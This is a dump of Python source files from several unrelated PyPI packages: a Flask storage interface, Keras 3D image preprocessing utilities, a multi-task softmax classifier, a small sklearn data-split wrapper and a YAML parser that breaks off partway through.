assert len(items) == 1, 'Too many items to unpack.'
return items[0]
def update_list(self, data_params, **kwargs):
"""
Update list of items. Each of items to update should contain
primary key. The rest of item parameters are values to update.
Each updated item should be wrapped in Params class and
should contain primary key.
:param data_params: items to update,
list of flask_restive.params.Params
:type data_params: list
:param kwargs: options
:return: updated items, list of flask_restive.params.Params
:rtype: list
"""
raise NotImplementedError
def delete_list(self, filter_params=None, **kwargs):
"""
Delete list of items by filter.
:param filter_params: filtering parameters
:type filter_params: flask_restive.params.Params
:param kwargs: options
"""
raise NotImplementedError | PypiClean |
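# A minimal concrete Storage sketch (commented out; filtering, slicing and
# sorting are ignored and items live in a plain list):
#
#   class MemoryStorage(Storage):
#
#       def open(self):
#           self._items = []
#
#       def close(self, exception=None):
#           pass
#
#       def get_count(self, filter_params=None, **kwargs):
#           return len(self._items)
#
#       def get_list(self, filter_params=None, slice_params=None,
#                    sorting_params=None, **kwargs):
#           return list(self._items)
#
#       def create_list(self, data_params, **kwargs):
#           self._items.extend(data_params)
#           return data_params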
/Keras_Applications_3D-0.1.0-py3-none-any.whl/keras_applications_3d/imagenet_utils.py | from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import json
import warnings
import numpy as np
from . import get_submodules_from_kwargs
from tensorflow.python.keras import activations
CLASS_INDEX = None
CLASS_INDEX_PATH = ('https://storage.googleapis.com/download.tensorflow.org/'
'data/imagenet_class_index.json')
def _preprocess_numpy_input(x, data_format, mode, **kwargs):
"""Preprocesses a Numpy array encoding a batch of images.
# Arguments
x: Input array, 3D or 4D.
data_format: Data format of the image array.
mode: One of "caffe", "tf" or "torch".
- caffe: will convert the images from RGB to BGR,
then will zero-center each color channel with
respect to the ImageNet dataset,
without scaling.
- tf: will scale pixels between -1 and 1,
sample-wise.
- torch: will scale pixels between 0 and 1 and then
will normalize each channel with respect to the
ImageNet dataset.
# Returns
Preprocessed Numpy array.
"""
backend, _, _, _ = get_submodules_from_kwargs(kwargs)
if not issubclass(x.dtype.type, np.floating):
x = x.astype(backend.floatx(), copy=False)
if mode == 'tf':
x /= 127.5
x -= 1.
return x
if mode == 'torch':
x /= 255.
mean = [0.485, 0.456, 0.406]
std = [0.229, 0.224, 0.225]
else:
if data_format == 'channels_first':
# 'RGB'->'BGR'
if x.ndim == 3:
x = x[::-1, ...]
else:
x = x[:, ::-1, ...]
else:
# 'RGB'->'BGR'
x = x[..., ::-1]
mean = [103.939, 116.779, 123.68]
std = None
# Zero-center by mean pixel
if data_format == 'channels_first':
if x.ndim == 3:
x[0, :, :] -= mean[0]
x[1, :, :] -= mean[1]
x[2, :, :] -= mean[2]
if std is not None:
x[0, :, :] /= std[0]
x[1, :, :] /= std[1]
x[2, :, :] /= std[2]
else:
x[:, 0, :, :] -= mean[0]
x[:, 1, :, :] -= mean[1]
x[:, 2, :, :] -= mean[2]
if std is not None:
x[:, 0, :, :] /= std[0]
x[:, 1, :, :] /= std[1]
x[:, 2, :, :] /= std[2]
else:
x[..., 0] -= mean[0]
x[..., 1] -= mean[1]
x[..., 2] -= mean[2]
if std is not None:
x[..., 0] /= std[0]
x[..., 1] /= std[1]
x[..., 2] /= std[2]
return x
def _preprocess_symbolic_input(x, data_format, mode, **kwargs):
"""Preprocesses a tensor encoding a batch of images.
# Arguments
x: Input tensor, 3D or 4D.
data_format: Data format of the image tensor.
mode: One of "caffe", "tf" or "torch".
- caffe: will convert the images from RGB to BGR,
then will zero-center each color channel with
respect to the ImageNet dataset,
without scaling.
- tf: will scale pixels between -1 and 1,
sample-wise.
- torch: will scale pixels between 0 and 1 and then
will normalize each channel with respect to the
ImageNet dataset.
# Returns
Preprocessed tensor.
"""
backend, _, _, _ = get_submodules_from_kwargs(kwargs)
if mode == 'tf':
x /= 127.5
x -= 1.
return x
if mode == 'torch':
x /= 255.
mean = [0.485, 0.456, 0.406]
std = [0.229, 0.224, 0.225]
else:
if data_format == 'channels_first':
# 'RGB'->'BGR'
if backend.ndim(x) == 3:
x = x[::-1, ...]
else:
x = x[:, ::-1, ...]
else:
# 'RGB'->'BGR'
x = x[..., ::-1]
mean = [103.939, 116.779, 123.68]
std = None
mean_tensor = backend.constant(-np.array(mean))
# Zero-center by mean pixel
if backend.dtype(x) != backend.dtype(mean_tensor):
x = backend.bias_add(
x, backend.cast(mean_tensor, backend.dtype(x)),
data_format=data_format)
else:
x = backend.bias_add(x, mean_tensor, data_format)
if std is not None:
x /= std
return x
def preprocess_input(x, data_format=None, mode='caffe', **kwargs):
"""Preprocesses a tensor or Numpy array encoding a batch of images.
# Arguments
x: Input Numpy or symbolic tensor, 3D or 4D.
The preprocessed data is written over the input data
if the data types are compatible. To avoid this
behaviour, `numpy.copy(x)` can be used.
data_format: Data format of the image tensor/array.
mode: One of "caffe", "tf" or "torch".
- caffe: will convert the images from RGB to BGR,
then will zero-center each color channel with
respect to the ImageNet dataset,
without scaling.
- tf: will scale pixels between -1 and 1,
sample-wise.
- torch: will scale pixels between 0 and 1 and then
will normalize each channel with respect to the
ImageNet dataset.
# Returns
Preprocessed tensor or Numpy array.
# Raises
ValueError: In case of unknown `data_format` argument.
"""
backend, _, _, _ = get_submodules_from_kwargs(kwargs)
if data_format is None:
data_format = backend.image_data_format()
if data_format not in {'channels_first', 'channels_last'}:
raise ValueError('Unknown data_format ' + str(data_format))
if isinstance(x, np.ndarray):
return _preprocess_numpy_input(x, data_format=data_format,
mode=mode, **kwargs)
else:
return _preprocess_symbolic_input(x, data_format=data_format,
mode=mode, **kwargs)
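# Illustrative call (commented out so importing this module stays
# side-effect free). Depending on how get_submodules_from_kwargs resolves
# defaults, explicit backend/layers kwargs may be required:
#
#   batch = np.random.randint(0, 256, (2, 32, 32, 32, 1)).astype("float32")
#   batch = preprocess_input(batch, mode="tf")   # scaled to [-1, 1]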
def decode_predictions(preds, top=5, **kwargs):
"""Decodes the prediction of an ImageNet model.
# Arguments
preds: Numpy tensor encoding a batch of predictions.
top: Integer, how many top-guesses to return.
# Returns
A list of lists of top class prediction tuples
`(class_name, class_description, score)`.
One list of tuples per sample in batch input.
# Raises
ValueError: In case of invalid shape of the `pred` array
(must be 2D).
"""
global CLASS_INDEX
backend, _, _, keras_utils = get_submodules_from_kwargs(kwargs)
if len(preds.shape) != 2 or preds.shape[1] != 1000:
raise ValueError('`decode_predictions` expects '
'a batch of predictions '
'(i.e. a 2D array of shape (samples, 1000)). '
'Found array with shape: ' + str(preds.shape))
if CLASS_INDEX is None:
fpath = keras_utils.get_file(
'imagenet_class_index.json',
CLASS_INDEX_PATH,
cache_subdir='models',
file_hash='c2c37ea517e94d9795004a39431a14cb')
with open(fpath) as f:
CLASS_INDEX = json.load(f)
results = []
for pred in preds:
top_indices = pred.argsort()[-top:][::-1]
result = [tuple(CLASS_INDEX[str(i)]) + (pred[i],) for i in top_indices]
result.sort(key=lambda x: x[2], reverse=True)
results.append(result)
return results
def obtain_input_shape(input_shape,
default_size,
min_size,
data_format,
require_flatten,
weights=None):
"""Internal utility to compute/validate a model's input shape.
# Arguments
input_shape: Either None (will return the default network input shape),
or a user-provided shape to be validated.
default_size: Default input width/height for the model.
min_size: Minimum input width/height accepted by the model.
data_format: Image data format to use.
require_flatten: Whether the model is expected to
be linked to a classifier via a Flatten layer.
weights: One of `None` (random initialization)
or 'imagenet' (pre-training on ImageNet).
If weights='imagenet' input channels must be equal to 3.
# Returns
An integer shape tuple (may include None entries).
# Raises
ValueError: In case of invalid argument values.
"""
if weights != 'imagenet' and input_shape and len(input_shape) == 3:
if data_format == 'channels_first':
if input_shape[0] not in {1, 3}:
warnings.warn(
'This model usually expects 1 or 3 input channels. '
'However, it was passed an input_shape with ' +
str(input_shape[0]) + ' input channels.')
default_shape = (input_shape[0], default_size, default_size)
else:
if input_shape[-1] not in {1, 3}:
warnings.warn(
'This model usually expects 1 or 3 input channels. '
'However, it was passed an input_shape with ' +
str(input_shape[-1]) + ' input channels.')
default_shape = (default_size, default_size, input_shape[-1])
else:
if data_format == 'channels_first':
default_shape = (3, default_size, default_size)
else:
default_shape = (default_size, default_size, 3)
if weights == 'imagenet' and require_flatten:
if input_shape is not None:
if input_shape != default_shape:
raise ValueError('When setting `include_top=True` '
'and loading `imagenet` weights, '
'`input_shape` should be ' +
str(default_shape) + '.')
return default_shape
if input_shape:
if data_format == 'channels_first':
if input_shape is not None:
if len(input_shape) != 3:
raise ValueError(
'`input_shape` must be a tuple of three integers.')
if input_shape[0] != 3 and weights == 'imagenet':
raise ValueError('The input must have 3 channels; got '
'`input_shape=' + str(input_shape) + '`')
if ((input_shape[1] is not None and input_shape[1] < min_size) or
(input_shape[2] is not None and input_shape[2] < min_size)):
raise ValueError('Input size must be at least ' +
str(min_size) + 'x' + str(min_size) +
'; got `input_shape=' +
str(input_shape) + '`')
else:
if input_shape is not None:
if len(input_shape) != 4:
raise ValueError(
                        '`input_shape` must be a tuple of four integers.')
# if input_shape[-1] != 4 and weights == 'imagenet':
# raise ValueError('The input must have 4 channels; got '
# '`input_shape=' + str(input_shape) + '`')
if weights != None:
raise ValueError('We don\'t have any pre-trained weight yet.')
if ((input_shape[0] is not None and input_shape[0] < min_size) or
(input_shape[1] is not None and input_shape[1] < min_size) or
(input_shape[2] is not None and input_shape[2] < min_size)) :
raise ValueError('Input size must be at least ' +
str(min_size) + 'x' + str(min_size) + 'x' + str(min_size) +
'; got `input_shape=' +
str(input_shape) + '`')
else:
if require_flatten:
input_shape = default_shape
else:
if data_format == 'channels_first':
input_shape = (3, None, None)
else:
input_shape = (None, None, 3)
if require_flatten:
if None in input_shape:
raise ValueError('If `include_top` is True, '
'you should specify a static `input_shape`. '
'Got `input_shape=' + str(input_shape) + '`')
return input_shape
def correct_pad(inputs, kernel_size, **kwargs):
    """Returns a tuple for zero-padding for 2D convolution with downsampling.
    Args:
        inputs: Input tensor.
        kernel_size: An integer or tuple/list of 2 integers.
    Returns:
        A tuple.
    """
    backend, _, _, _ = get_submodules_from_kwargs(kwargs)
img_dim = 2 if backend.image_data_format() == 'channels_first' else 1
input_size = backend.int_shape(inputs)[img_dim:(img_dim + 2)]
if isinstance(kernel_size, int):
kernel_size = (kernel_size, kernel_size)
if input_size[0] is None:
adjust = (1, 1)
else:
adjust = (1 - input_size[0] % 2, 1 - input_size[1] % 2)
correct = (kernel_size[0] // 2, kernel_size[1] // 2)
return ((correct[0] - adjust[0], correct[0]),
(correct[1] - adjust[1], correct[1]))
def validate_activation(classifier_activation, weights):
"""validates that the classifer_activation is compatible with the weights.
Args:
classifier_activation: str or callable activation function
weights: The pretrained weights to load.
Raises:
ValueError: if an activation other than `None` or `softmax` are used with
pretrained weights.
"""
if weights is None:
return
classifier_activation = activations.get(classifier_activation)
if classifier_activation not in {
activations.get('softmax'),
activations.get(None)
}:
raise ValueError('Only `None` and `softmax` activations are allowed '
'for the `classifier_activation` argument when using '
'pretrained weights, with `include_top=True`') | PypiClean |
/MD_MTL-0.0.9-py3-none-any.whl/Vampyr_MTL/functions/MTL_Softmax_L21.py | import numpy as np
from .init_opts import init_opts
from numpy import linalg as LA
from tqdm import tqdm
from tqdm import trange
import sys
import time
from ..evaluations.utils import opts
class MTL_Softmax_L21:
"""MTL multiclass logistic regression with hinge loss and L21 penalty
"""
def __init__(self, opts, rho1=0.01):
"""Initialization of MTL multiclass classification function
Args:
opts (opts): initalization class from opts
rho1 (int, optional): L2,1-norm group Lasso parameter. Defaults to 0.01
"""
self.opts = init_opts(opts)
self.rho1 = rho1
self.rho_L2 = 0
if hasattr(opts, 'rho_L2'):
rho_L2 = opts.rho_L2
def fit(self, X, Y, **kwargs):
"""Fit with training samples and train
t: task number
n: number of entries
d: data dimension
Args:
X ([np.array(np.array)]): t x n x d.
Y ([np.array(np.array)]): t x n x 1.
"""
self.task_num = len(X)
_, self.dimension = X[0].shape
task_num = self.task_num
dimension = self.dimension
if 'rho' in kwargs.keys():
print(kwargs)
self.rho1 = kwargs['rho']
X_new = []
for i in range(len(X)):
X_new.append(np.transpose(X[i]))
X = X_new
# y type check:
dt =Y[0].dtype
Y_new = []
m=0
if(np.issubdtype(dt, np.number)):
m = max(np.max(i) for i in Y)+1
self.encode_mtx = None
elif(np.issubdtype(dt, np.character) or np.issubdtype(dt, np.object)):
unq = set([])
for t in range(self.task_num):
unq = unq.union(set(Y[t]))
self.encode_mtx = {j:i for i,j in enumerate(unq)} # check encoding seq
self.decode_mtx = {i:j for i,j in enumerate(unq)} # decode the seq
m = len(unq)
# change Y str to num, make a copy of Y to avoid addr change
Y_cp=[0]*self.task_num
for t in range(self.task_num):
tmp_y = []
for j in Y[t]:
tmp_y.append(self.encode_mtx[j])
Y_cp[t] = np.array(tmp_y)
Y=Y_cp
else:
raise TypeError('Invalid target type')
self.encoding = m
for t in range(self.task_num):
s = int(Y[t].size)
Y_new_t = np.zeros((s, m))
Y_new_t[np.arange(s),Y[t]] = 1
Y_new.append(Y_new_t)
Y_old = Y
Y = Y_new
self.X = X
self.Y = Y
# transpose X to size: t x d x n
# encoding Y to size: t x n x m
funcVal = []
C0_prep = np.zeros((task_num, self.encoding))
for t_idx in range(task_num):
m1 = np.count_nonzero(Y_old[t_idx]==1)
m2 = np.count_nonzero(Y_old[t_idx]==-1)
if(m1==0 or m2==0):
                # imbalanced label
C0_prep[t_idx] = 0
else:
C0_prep[t_idx] = np.log(m1/m2)
if self.opts.init==2:
W0 = np.zeros((dimension, task_num, self.encoding))
C0 = np.zeros((task_num, self.encoding))
elif self.opts.init == 0:
W0 = np.random.randn(dimension, task_num, self.encoding)
C0 = C0_prep
else:
if hasattr(self.opts,'W0'):
W0=self.opts.W0
if(W0.shape!=(dimension, task_num, self.encoding)):
raise TypeError('\n Check input W0 size')
else:
W0 = np.zeros((dimension, task_num, self.encoding))
if hasattr(self.opts, 'C0'):
C0 = self.opts.C0
else:
C0 = C0_prep
# this flag checks if gradient descent only makes significant step
bFlag=0
Wz= W0
Cz = C0
Wz_old = W0
Cz_old = C0
t = 1
t_old = 0
gamma = 1
gamma_inc = 2
for it in trange(self.opts.maxIter, file=sys.stdout, desc='outer loop'):
alpha = (t_old - 1)/t
Ws = (1 + alpha) * Wz - alpha * Wz_old
Cs = (1 + alpha) * Cz - alpha * Cz_old
gWs, gCs, Fs = self.gradVal_eval(Ws, Cs)
for in_it in trange(1000,file=sys.stdout, leave=False, unit_scale=True, desc='inner loop'):
Wzp = self.FGLasso_projection(Ws - gWs/gamma, self.rho1 / gamma)
Czp = Cs - gCs/gamma
Fzp = self.funVal_eval(Wzp, Czp)
delta_Wzp = Wzp - Ws
delta_Czp = Czp - Cs
nrm_delta_Wzp = LA.norm(delta_Wzp)**2
nrm_delta_Czp = LA.norm(delta_Czp)**2
r_sum = (nrm_delta_Czp + nrm_delta_Wzp)/2
Fzp_gamma = Fs + np.sum(delta_Wzp*gWs) + np.sum(delta_Czp*gCs)+ gamma/2 * r_sum*2
if (r_sum <=1e-20):
bFlag=1 # this shows that, the gradient step makes little improvement
break
if (Fzp <= Fzp_gamma):
break
else:
gamma = gamma * gamma_inc
Wz_old = Wz
Cz_old = Cz
Wz = Wzp
Cz = Czp
funcVal.append(Fzp + self.nonsmooth_eval(Wz, self.rho1))
if (bFlag):
                print('\n The program terminates as the gradient step changes the solution very little.')
break
if(self.opts.tFlag == 0):
if it>=2:
if (abs( funcVal[-1] - funcVal[-2]) <= self.opts.tol):
break
elif(self.opts.tFlag == 1):
if it>=2:
if (abs( funcVal[-1] - funcVal[-2] ) <= self.opts.tol* funcVal[-2]):
break
elif(self.opts.tFlag == 2):
if ( funcVal[-1]<= self.opts.tol):
break
elif(self.opts.tFlag == 3):
if it>=self.opts.maxIter:
break
t_old = t
t = 0.5 * (1 + (1+ 4 * t**2)**0.5)
self.W = Wzp
self.funcVal = funcVal
def FGLasso_projection (self, D, lmbd):
"""Lasso projection for panelties
Args:
D (np.array(np.array)): Weight matrix
lmbd (int): panelties param
Returns:
(np.array(np.array)): panelties
"""
# l2.1 norm projection.
ss = np.sum(D**2,axis=1)
sq = np.sqrt(ss.astype(float))
# of shape: d x m, sum in direction of task t
tmp = np.tile(np.maximum(0, 1 - lmbd/sq),(D.shape[1], 1, 1)).transpose(1,0,2)
return tmp*D
# smooth part gradient.
def gradVal_eval(self, W, C):
"""Gradient Decent
Args:
W (np.array(np.array)): Weight Matrix with shape (d, t)
C (np.array): intercept Matrix with shape (t, 1)
Returns:
grad_W (np.array(np.array)): gradient matrix of weight, shape (d, t)
"""
grad_W = np.zeros((self.dimension, self.task_num, self.encoding))
grad_C = np.zeros((self.task_num, self.encoding))
lossValVect = np.zeros((1, self.task_num))
if self.opts.pFlag:
# grad_W = zeros(zeros(W));
# parfor i = 1:task_num
# grad_W (i, :) = X{i}*(X{i}' * W(:,i)-Y{i})
pass
else:
for i in range(self.task_num):
grad_W[:,i], grad_C[i], lossValVect[:,i] = self.unit_grad_eval(W[:,i], C[i], i)
grad_W = grad_W+ self.rho_L2 * 2 * W
funcVal = np.sum(lossValVect) + self.rho_L2 * LA.norm(W)**2
return grad_W, grad_C, funcVal
def funVal_eval(self, W, C):
"""Loss Accumulation
Args:
            W (np.array(np.array)): weight matrix of shape (d, t, m)
            C (np.array): intercept matrix with shape (t, m)
Returns:
funcval (float): loss
"""
funcVal = 0
if self.opts.pFlag:
# parfor i = 1: task_num
# funcVal = funcVal + 0.5 * norm (Y{i} - X{i}' * W(:, i))^2;
# end
pass
else:
for i in range(self.task_num):
funcVal = funcVal + self.unit_funcVal_eval(W[:,i], C[i], i)
funcVal = funcVal + self.rho_L2 * LA.norm(W)**2
return funcVal
def nonsmooth_eval(self, W, rho_1):
"""non-smooth loss evaluation
Args:
W (np.array(np.array)): weight matrix of shape (d, t)
rho1 (float): L2,1-norm group Lasso parameter
Returns:
(float): loss
"""
non_smooth_value = 0
if self.opts.pFlag:
pass
else:
for i in range(self.dimension):
w = W[i, :]
non_smooth_value = non_smooth_value+ rho_1 * LA.norm(w, ord=2)
return non_smooth_value
def unit_grad_eval(self, w, c, task_idx):
"""Gradient decent in individual tasks
Args:
w (np.array): weight matrix of shape (d, 1), corresponding to individual task
c (int): intercept Matrix with shape (1), corresponding to individual task
task_idx (int): task index
Returns:
(np.array): gradient weight array
(int): gradient intercept
(int): task individual loss
"""
weight = np.ones((1, self.Y[task_idx].shape[0]))/self.task_num
weighty = 1/self.task_num * self.Y[task_idx]
_, n = self.X[task_idx].shape
z = -self.Y[task_idx]*(np.transpose(self.X[task_idx])@w + np.tile(c, (n, 1)))
hinge = np.maximum(z, 0)
funcVal = np.sum((weight @ (np.log(np.exp(-hinge)+np.exp(z-hinge))+hinge)))
prob = 1./(1+np.exp(z))
z_prob = -weighty*(1-prob)
grad_c = np.sum(z_prob)
grad_w = self.X[task_idx]@z_prob
return grad_w, grad_c, funcVal
def unit_funcVal_eval(self, w, c, task_idx):
"""individual loss in each task
Args:
w (np.array): weight matrix of shape (d, 1), corresponding to individual task
c (int): intercept Matrix with shape (1), corresponding to individual task
task_idx (int): task index
Returns:
(int): individual loss
"""
weight = np.ones((1, self.Y[task_idx].shape[0]))/self.task_num
z = -self.Y[task_idx]*(np.transpose(self.X[task_idx])@w + c)
hinge = np.maximum(z, 0)
funcVal = np.sum(weight @ (np.log(np.exp(-hinge)+np.exp(z-hinge))+hinge))
return funcVal
def get_params(self, deep = False):
"""Get inbult initalization params
Args:
deep (bool, optional): deep traverse. Defaults to False.
Returns:
(dict): dictionary of all inits
"""
return {'rho1':self.rho1, 'opts':self.opts}
def _trained_parames(self):
"""get all trained parameters
Returns:
(tuple): tuple containing:
([np.array(np.array)]): training weight matrix
(float): final loss
"""
return self.W, self.funcVal
def softmax(self, z):
"""Softmax function squash to one dimension
Args:
z (np.array): input array
Returns:
(np.array): out put softmax-ed
"""
z -= np.max(z)
sm = (np.exp(z).T / np.sum(np.exp(z),axis=1)).T
return sm
def predict(self, X):
"""Predict with test data
Args:
X [(np.array(np.array))]: input to predict, shape (t, n, d)
Returns:
([np.array()]): predict matrix, shape (t, n ,1)
"""
pred = []
for i in range(self.task_num):
pp = np.reshape(X[i], (-1, self.dimension)) @ self.W[:, i]
probs = self.softmax(pp)
preds = np.argmax(probs,axis=1)
if(self.encode_mtx!=None):
temp = []
for p in preds:
temp.append(self.decode_mtx[p])
preds = np.array(temp)
pred.append(preds)
return pred
def score(self, X, Y):
pred = self.predict(X)
correct = 0
total = 0
for i, j in zip(Y, pred):
for k,l in zip(i,j):
if(k == l):
correct+=1
total+=1
acc = correct/total
return acc | PypiClean |
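if __name__ == "__main__":
    # Hedged smoke test with synthetic data. The bare options object below
    # only carries the attributes this class actually reads (maxIter, tol,
    # tFlag, init, pFlag); the shipped `opts` helper from evaluations.utils
    # may expect a different construction.
    from types import SimpleNamespace
    o = SimpleNamespace(maxIter=50, tol=1e-4, tFlag=1, init=2, pFlag=False)
    rng = np.random.RandomState(0)
    X = [rng.randn(30, 5) for _ in range(2)]       # 2 tasks, 30 samples x 5 features
    Y = [rng.randint(0, 3, 30) for _ in range(2)]  # 3 classes per task
    clf = MTL_Softmax_L21(o, rho1=0.1)
    clf.fit(X, Y)
    print("train accuracy:", clf.score(X, Y))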
/Bayesian1990_model-3.0.tar.gz/Bayesian1990_model-3.0/Bayesian1990_model/model_class.py | import pandas as pd
#Import machine learning packages
from sklearn.linear_model import LinearRegression
from sklearn.model_selection import train_test_split #split
#Define a general model class
class model():
"""
general model class for implementing modelling.
Attributes:
X (pandas dataframe) representing the design matrix
y (pandas dataframe) representing the response variable
"""
def __init__(self,X=pd.DataFrame() ,y=pd.DataFrame() ):
self.X=X
        self.y=y
self.X_train=pd.DataFrame()
self.X_test=pd.DataFrame()
self.y_train=pd.DataFrame()
self.y_test=pd.DataFrame()
def load_dataset(self,file_name,response):
"""Method to import data from a csv file (in the same directory). The data object is just a dictionary containing all the available information
and then converted to pandas dataframe respectively assigned to design matrix X and response y.
Args:
None
Returns:
None
"""
#import csv dataset
df = pd.read_csv(file_name)
#update design matrix X in the main corpus of model class
self.X=df.drop(columns =response)
#update response y in the main corpus of model class
self.y=df[response]
def split_method(self):
"""Method to split the response and design matrix X and response y to train and test sets respectively, thus
X_train, X_test, y_train, y_test using the train_test_split() method from sklearn.
Args:
None
Returns:
None
"""
#Split train/test set and update the dataframes self.X_train, self.X_test, self.y_train and self.y_test respectively
self.X_train, self.X_test, self.y_train, self.y_test = train_test_split(self.X, self.y, test_size = 0.3, random_state=2022) | PypiClean |
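if __name__ == "__main__":
    # Illustrative run; "data.csv" and the "target" column are placeholders
    # for a real file in the working directory.
    m = model()
    m.load_dataset("data.csv", "target")
    m.split_method()
    print(m.X_train.shape, m.X_test.shape)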
/CustomPipeline-0.0.3-py3-none-any.whl/rplibs/yaml/yaml_py3/parser.py |
__all__ = ['Parser', 'ParserError']
from .error import MarkedYAMLError
from .tokens import *
from .events import *
from .scanner import *
class ParserError(MarkedYAMLError):
pass
class Parser:
# Since writing a recursive-descendant parser is a straightforward task, we
# do not give many comments here.
DEFAULT_TAGS = {
'!': '!',
'!!': 'tag:yaml.org,2002:',
}
def __init__(self):
self.current_event = None
self.yaml_version = None
self.tag_handles = {}
self.states = []
self.marks = []
self.state = self.parse_stream_start
def dispose(self):
# Reset the state attributes (to clear self-references)
self.states = []
self.state = None
def check_event(self, *choices):
# Check the type of the next event.
if self.current_event is None:
if self.state:
self.current_event = self.state()
if self.current_event is not None:
if not choices:
return True
for choice in choices:
if isinstance(self.current_event, choice):
return True
return False
def peek_event(self):
# Get the next event.
if self.current_event is None:
if self.state:
self.current_event = self.state()
return self.current_event
def get_event(self):
# Get the next event and proceed further.
if self.current_event is None:
if self.state:
self.current_event = self.state()
value = self.current_event
self.current_event = None
return value
# stream ::= STREAM-START implicit_document? explicit_document* STREAM-END
# implicit_document ::= block_node DOCUMENT-END*
# explicit_document ::= DIRECTIVE* DOCUMENT-START block_node? DOCUMENT-END*
def parse_stream_start(self):
# Parse the stream start.
token = self.get_token()
event = StreamStartEvent(token.start_mark, token.end_mark,
encoding=token.encoding)
# Prepare the next state.
self.state = self.parse_implicit_document_start
return event
def parse_implicit_document_start(self):
# Parse an implicit document.
if not self.check_token(DirectiveToken, DocumentStartToken,
StreamEndToken):
self.tag_handles = self.DEFAULT_TAGS
token = self.peek_token()
start_mark = end_mark = token.start_mark
event = DocumentStartEvent(start_mark, end_mark,
explicit=False)
# Prepare the next state.
self.states.append(self.parse_document_end)
self.state = self.parse_block_node
return event
else:
return self.parse_document_start()
def parse_document_start(self):
# Parse any extra document end indicators.
while self.check_token(DocumentEndToken):
self.get_token()
# Parse an explicit document.
if not self.check_token(StreamEndToken):
token = self.peek_token()
start_mark = token.start_mark
version, tags = self.process_directives()
if not self.check_token(DocumentStartToken):
raise ParserError(None, None,
"expected '<document start>', but found %r"
% self.peek_token().id,
self.peek_token().start_mark)
token = self.get_token()
end_mark = token.end_mark
event = DocumentStartEvent(start_mark, end_mark,
explicit=True, version=version, tags=tags)
self.states.append(self.parse_document_end)
self.state = self.parse_document_content
else:
# Parse the end of the stream.
token = self.get_token()
event = StreamEndEvent(token.start_mark, token.end_mark)
assert not self.states
assert not self.marks
self.state = None
return event
def parse_document_end(self):
# Parse the document end.
token = self.peek_token()
start_mark = end_mark = token.start_mark
explicit = False
if self.check_token(DocumentEndToken):
token = self.get_token()
end_mark = token.end_mark
explicit = True
event = DocumentEndEvent(start_mark, end_mark,
explicit=explicit)
# Prepare the next state.
self.state = self.parse_document_start
return event
def parse_document_content(self):
if self.check_token(DirectiveToken,
DocumentStartToken, DocumentEndToken, StreamEndToken):
event = self.process_empty_scalar(self.peek_token().start_mark)
self.state = self.states.pop()
return event
else:
return self.parse_block_node()
def process_directives(self):
self.yaml_version = None
self.tag_handles = {}
while self.check_token(DirectiveToken):
token = self.get_token()
if token.name == 'YAML':
if self.yaml_version is not None:
raise ParserError(None, None,
"found duplicate YAML directive", token.start_mark)
major, minor = token.value
if major != 1:
raise ParserError(None, None,
"found incompatible YAML document (version 1.* is required)",
token.start_mark)
self.yaml_version = token.value
elif token.name == 'TAG':
handle, prefix = token.value
if handle in self.tag_handles:
raise ParserError(None, None,
"duplicate tag handle %r" % handle,
token.start_mark)
self.tag_handles[handle] = prefix
if self.tag_handles:
value = self.yaml_version, self.tag_handles.copy()
else:
value = self.yaml_version, None
for key in self.DEFAULT_TAGS:
if key not in self.tag_handles:
self.tag_handles[key] = self.DEFAULT_TAGS[key]
return value
# block_node_or_indentless_sequence ::= ALIAS
# | properties (block_content | indentless_block_sequence)?
# | block_content
# | indentless_block_sequence
# block_node ::= ALIAS
# | properties block_content?
# | block_content
# flow_node ::= ALIAS
# | properties flow_content?
# | flow_content
# properties ::= TAG ANCHOR? | ANCHOR TAG?
# block_content ::= block_collection | flow_collection | SCALAR
# flow_content ::= flow_collection | SCALAR
# block_collection ::= block_sequence | block_mapping
# flow_collection ::= flow_sequence | flow_mapping
def parse_block_node(self):
return self.parse_node(block=True)
def parse_flow_node(self):
return self.parse_node()
def parse_block_node_or_indentless_sequence(self):
return self.parse_node(block=True, indentless_sequence=True)
def parse_node(self, block=False, indentless_sequence=False):
if self.check_token(AliasToken):
token = self.get_token()
event = AliasEvent(token.value, token.start_mark, token.end_mark)
self.state = self.states.pop()
else:
anchor = None
tag = None
start_mark = end_mark = tag_mark = None
if self.check_token(AnchorToken):
token = self.get_token()
start_mark = token.start_mark
end_mark = token.end_mark
anchor = token.value
if self.check_token(TagToken):
token = self.get_token()
tag_mark = token.start_mark
end_mark = token.end_mark
tag = token.value
elif self.check_token(TagToken):
token = self.get_token()
start_mark = tag_mark = token.start_mark
end_mark = token.end_mark
tag = token.value
if self.check_token(AnchorToken):
token = self.get_token()
end_mark = token.end_mark
anchor = token.value
if tag is not None:
handle, suffix = tag
if handle is not None:
if handle not in self.tag_handles:
raise ParserError("while parsing a node", start_mark,
"found undefined tag handle %r" % handle,
tag_mark)
tag = self.tag_handles[handle]+suffix
else:
tag = suffix
#if tag == '!':
# raise ParserError("while parsing a node", start_mark,
# "found non-specific tag '!'", tag_mark,
# "Please check 'http://pyyaml.org/wiki/YAMLNonSpecificTag' and share your opinion.")
if start_mark is None:
start_mark = end_mark = self.peek_token().start_mark
event = None
implicit = (tag is None or tag == '!')
if indentless_sequence and self.check_token(BlockEntryToken):
end_mark = self.peek_token().end_mark
event = SequenceStartEvent(anchor, tag, implicit,
start_mark, end_mark)
self.state = self.parse_indentless_sequence_entry
else:
if self.check_token(ScalarToken):
token = self.get_token()
end_mark = token.end_mark
if (token.plain and tag is None) or tag == '!':
implicit = (True, False)
elif tag is None:
implicit = (False, True)
else:
implicit = (False, False)
event = ScalarEvent(anchor, tag, implicit, token.value,
start_mark, end_mark, style=token.style)
self.state = self.states.pop()
elif self.check_token(FlowSequenceStartToken):
end_mark = self.peek_token().end_mark
event = SequenceStartEvent(anchor, tag, implicit,
start_mark, end_mark, flow_style=True)
self.state = self.parse_flow_sequence_first_entry
elif self.check_token(FlowMappingStartToken):
end_mark = self.peek_token().end_mark
event = MappingStartEvent(anchor, tag, implicit,
start_mark, end_mark, flow_style=True)
self.state = self.parse_flow_mapping_first_key
elif block and self.check_token(BlockSequenceStartToken):
end_mark = self.peek_token().start_mark
event = SequenceStartEvent(anchor, tag, implicit,
start_mark, end_mark, flow_style=False)
self.state = self.parse_block_sequence_first_entry
elif block and self.check_token(BlockMappingStartToken):
end_mark = self.peek_token().start_mark
event = MappingStartEvent(anchor, tag, implicit,
start_mark, end_mark, flow_style=False)
self.state = self.parse_block_mapping_first_key
elif anchor is not None or tag is not None:
# Empty scalars are allowed even if a tag or an anchor is
# specified.
event = ScalarEvent(anchor, tag, (implicit, False), '',
start_mark, end_mark)
self.state = self.states.pop()
else:
